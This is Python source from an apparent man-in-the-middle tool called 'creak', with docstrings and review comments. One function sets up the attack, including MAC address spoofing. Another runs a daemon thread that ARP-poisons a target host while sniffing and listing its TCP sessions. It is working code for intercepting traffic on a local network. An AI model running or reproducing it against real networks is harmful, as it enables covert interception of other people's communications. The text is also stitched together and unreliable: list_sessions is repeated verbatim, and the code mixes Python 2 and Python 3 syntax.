def get_mitm(parsed_args):
    """Create an object of type Mitm based on arguments received.

    Resolves the interface, source (gateway) and target from ``parsed_args``,
    prompting interactively (``raw_input`` — Python 2) for any that are
    missing, optionally changes the interface MAC address, reads the
    ``./creak/config`` file (path relative to the current working
    directory) and returns the selected engine.

    Args:
        parsed_args: argparse-style namespace; fields read here are
            ``dev``, ``source``, ``target``, ``verbosity``, ``debug``,
            ``spoof``, ``macaddr``, ``manufacturer`` and ``mode``.
            ``source`` and ``target`` are mutated in place.

    Returns:
        ``(args, changed, original_mac_addr, mitm)`` where ``changed`` is
        True only if ``utils.change_mac`` succeeded and ``mitm`` is a
        ``cmitm.ScapyMitm`` or ``cmitm.PcapMitm`` depending on the
        ``output.ENGINE`` config value.

    Raises:
        SystemExit: via ``sys.exit``/``exit`` when no interface is given or
            a prompted gateway/target is not an IPv4 address.
    """
    args = parsed_args
    if not args.dev:
        sys.exit(sys.argv[0] + ' -h for help\n[!] Must specify interface')
    # NOTE(review): joining with "','" only yields a plain name when
    # args.dev has exactly one entry; with several entries the quote
    # characters end up in the string passed to get_mac_by_dev — confirm
    # whether multiple interfaces are really supported.
    dev = "%s" % "','".join(args.dev)
    original_mac_addr = utils.get_mac_by_dev(dev)
    mac_addr, changed = original_mac_addr, False
    if not args.source:
        try:
            args.source = utils.get_default_gateway_linux()
        except OSError:
            # fall back to an interactive prompt; a non-IPv4 answer aborts
            args.source = raw_input('[!] Unable to retrieve default gateway, please specify one: ')
            if not utils.is_ipv4(args.source):
                exit('[!] Unable to retrieve default gateway, please specify one using -s option')
    else:
        pass
    if not args.target:
        args.target = raw_input('[?] No target address specified, please insert one: ')
        if not utils.is_ipv4(args.target):
            exit('[!] Must specify at least one target address')
    else:
        # a single-element list is collapsed to a plain string; longer
        # lists are passed through unchanged
        if len(args.target) == 1:
            args.target = ''.join(args.target)
    conf = ConfigParser.ConfigParser()
    conf.read('./creak/config')
    verbose = conf.getboolean('output', 'VERBOSE')
    debug = conf.getboolean('output', 'DEBUG')
    # command-line flags can only raise verbosity/debug, never lower them
    if args.verbosity:
        verbose = True
    if args.debug:
        debug = True
    if args.spoof is True:
        choice = raw_input('[+] In order to change MAC address ' + G + dev + W + ' must be temporary put down. '
                           'Proceed?[y/n] ')
        if choice == 'y':
            if not args.macaddr and not args.manufacturer:
                mac_addr = utils.fake_mac_address([], 1)
            elif args.macaddr and not args.manufacturer:
                # only derive a new address when the requested one differs
                # from the interface's current one
                if utils.parse_mac(args.macaddr) != utils.parse_mac(original_mac_addr):
                    mac_addr = utils.fake_mac_address(utils.mac_to_hex(args.macaddr))
            elif args.manufacturer:
                macs = utils.get_manufacturer(args.manufacturer)
                mac_addr = utils.fake_mac_address(utils.mac_to_hex(random.choice(macs)))
            try:
                utils.change_mac(dev, mac_addr)
                changed = True
            except OSError:
                # NOTE(review): the failure is swallowed and `changed` stays
                # False, but `mac_addr` already holds the new value, so the
                # Mitm object below is built with a MAC the interface does
                # not actually have — confirm this is intended.
                pass
            print("[+] Waiting for wireless reactivation..")
            # modes 1 and 2 wait longer for the interface to come back up
            if args.mode == 1 or args.mode == 2:
                time.sleep(10)
            else:
                time.sleep(4)
    # no spoof but set mac address anyway
    elif args.macaddr:
        mac_addr = args.macaddr
    print("[+] Using " + G + mac_addr + W + " MAC address\n"
          "[+] Set " + G + args.source + W + " as default gateway")
    # engine selection comes from the config file only; both engines get
    # the same constructor arguments
    if conf.get('output', 'ENGINE').lower() == 'scapy':
        return (args, changed, original_mac_addr,
                cmitm.ScapyMitm(dev, utils.parse_mac(mac_addr), args.source, args.target, debug, verbose))
    return (args, changed, original_mac_addr,
            cmitm.PcapMitm(dev, utils.parse_mac(mac_addr), args.source, args.target, debug, verbose))
def list_sessions(self, stop, target_b=None, port=None) -> None:
    """Try to get all TCP sessions of the target.

    Starts a daemon thread running ``self.poison`` and then reads frames
    from ``self.dev`` through a pcap filter built by
    ``self._build_pcap_filter``, printing each new TCP endpoint pair once
    and appending it to ``self.sessions``. RST segments are ignored.

    Args:
        stop: zero-argument callable polled once per captured packet; a
            truthy result ends the capture loop.
        target_b: optional second host; when set and different from
            ``self.gateway`` it is passed to ``self.poison`` and its MAC is
            shown as the ``source`` in the banner.
        port: optional port forwarded to ``_build_pcap_filter``.

    Side effects:
        Prints to stdout, appends to ``self.sessions``, spawns a daemon
        thread that is never joined. On KeyboardInterrupt only, calls
        ``self.restore(2)`` and ``utils.set_ip_forward(0)``.
    """
    # port -> label used for the printed classification; everything else
    # is reported as "Others"
    notorious_services = {
        20: ' ftp-data session',
        21: ' ftp-data session',
        22: ' ssh session',
        23: ' telnet session',
        25: ' SMTP session',
        80: ' HTTP session',
        110: ' POP3 session',
        143: ' IMAP session',
        194: ' IRC session',
        220: ' IMAPv3 session',
        443: ' SSL session',
        445: ' SAMBA session',
        989: ' FTPS session',
        990: ' FTPS session',
        992: ' telnet SSL session',
        993: ' IMAP SSL session',
        994: ' IRC SSL session'
    }
    # NOTE(review): `source` is only used in the banner below, but it holds
    # the gateway *IP* in one branch and a *MAC* (get_mac_by_ip) in the
    # other — confirm which is meant to be displayed.
    source = utils.get_default_gateway_linux()
    if target_b and target_b != self.gateway:
        source = utils.get_mac_by_ip(target_b)
    pcap_filter = self._build_pcap_filter("ip host ", port)
    packets = pcap.pcap(self.dev)
    packets.setfilter(pcap_filter)  # we need only self.target packets
    # need to create a daemon that continually poison our target
    # (daemon=True: the thread is abandoned, not stopped, when this
    # method returns)
    poison_thread = Thread(target=self.poison, args=(2, target_b, ))
    poison_thread.daemon = True
    poison_thread.start()
    print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W + ' and ' + R +
          (','.join(self.target) if isinstance(self.target, list) else self.target) + W + '\n')
    sessions = {}
    try:
        for _, pkt in packets:
            if stop():
                break
            eth = dpkt.ethernet.Ethernet(pkt)
            ip_packet = eth.data
            if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                tcp = ip_packet.data
                if tcp.flags != dpkt.tcp.TH_RST:
                    sess = "%-25s <-> %25s" % (inet_ntoa(ip_packet.src) + ":" + str(tcp.sport),
                                               inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport))
                    check = False
                    if sess not in sessions:
                        # first sighting of this src:sport <-> dst:dport pair;
                        # classify by whichever port is known, source first
                        check = True
                        sessions[sess] = "Others"
                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]
                    if check is True:
                        print(" [{:^5}] {} : {}".format(len(sessions), sess, sessions[sess]))
                        self.sessions.append(sess)
    except KeyboardInterrupt:
        # NOTE(review): restore(2) and set_ip_forward(0) run only on
        # Ctrl-C; leaving the loop via stop() skips them, so the poisoned
        # ARP state and IP forwarding are left as-is — confirm the caller
        # performs that cleanup.
        print('[+] Session scan interrupted\n\r')
        self.restore(2)
        utils.set_ip_forward(0)
def list_sessions(self, stop, target_b=None, port=None) -> None:
    """Try to get all TCP sessions of the target.

    Starts a daemon thread running ``self.poison`` and then reads frames
    from ``self.dev`` through a pcap filter built by
    ``self._build_pcap_filter``, printing each new TCP endpoint pair once
    and appending it to ``self.sessions``. RST segments are ignored.

    Args:
        stop: zero-argument callable polled once per captured packet; a
            truthy result ends the capture loop.
        target_b: optional second host; when set and different from
            ``self.gateway`` it is passed to ``self.poison`` and its MAC is
            shown as the ``source`` in the banner.
        port: optional port forwarded to ``_build_pcap_filter``.

    Side effects:
        Prints to stdout, appends to ``self.sessions``, spawns a daemon
        thread that is never joined. On KeyboardInterrupt only, calls
        ``self.restore(2)`` and ``utils.set_ip_forward(0)``.
    """
    # port -> label used for the printed classification; everything else
    # is reported as "Others"
    notorious_services = {
        20: ' ftp-data session',
        21: ' ftp-data session',
        22: ' ssh session',
        23: ' telnet session',
        25: ' SMTP session',
        80: ' HTTP session',
        110: ' POP3 session',
        143: ' IMAP session',
        194: ' IRC session',
        220: ' IMAPv3 session',
        443: ' SSL session',
        445: ' SAMBA session',
        989: ' FTPS session',
        990: ' FTPS session',
        992: ' telnet SSL session',
        993: ' IMAP SSL session',
        994: ' IRC SSL session'
    }
    # NOTE(review): `source` is only used in the banner below, but it holds
    # the gateway *IP* in one branch and a *MAC* (get_mac_by_ip) in the
    # other — confirm which is meant to be displayed.
    source = utils.get_default_gateway_linux()
    if target_b and target_b != self.gateway:
        source = utils.get_mac_by_ip(target_b)
    pcap_filter = self._build_pcap_filter("ip host ", port)
    packets = pcap.pcap(self.dev)
    packets.setfilter(pcap_filter)  # we need only self.target packets
    # need to create a daemon that continually poison our target
    # (daemon=True: the thread is abandoned, not stopped, when this
    # method returns)
    poison_thread = Thread(target=self.poison, args=(2, target_b, ))
    poison_thread.daemon = True
    poison_thread.start()
    print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W + ' and ' + R +
          (','.join(self.target) if isinstance(self.target, list) else self.target) + W + '\n')
    sessions = {}
    try:
        for _, pkt in packets:
            if stop():
                break
            eth = dpkt.ethernet.Ethernet(pkt)
            ip_packet = eth.data
            if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                tcp = ip_packet.data
                if tcp.flags != dpkt.tcp.TH_RST:
                    sess = "%-25s <-> %25s" % (inet_ntoa(ip_packet.src) + ":" + str(tcp.sport),
                                               inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport))
                    check = False
                    if sess not in sessions:
                        # first sighting of this src:sport <-> dst:dport pair;
                        # classify by whichever port is known, source first
                        check = True
                        sessions[sess] = "Others"
                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]
                    if check is True:
                        print(" [{:^5}] {} : {}".format(len(sessions), sess, sessions[sess]))
                        self.sessions.append(sess)
    except KeyboardInterrupt:
        # NOTE(review): restore(2) and set_ip_forward(0) run only on
        # Ctrl-C; leaving the loop via stop() skips them, so the poisoned
        # ARP state and IP forwarding are left as-is — confirm the caller
        # performs that cleanup.
        print('[+] Session scan interrupted\n\r')
        self.restore(2)
        utils.set_ip_forward(0)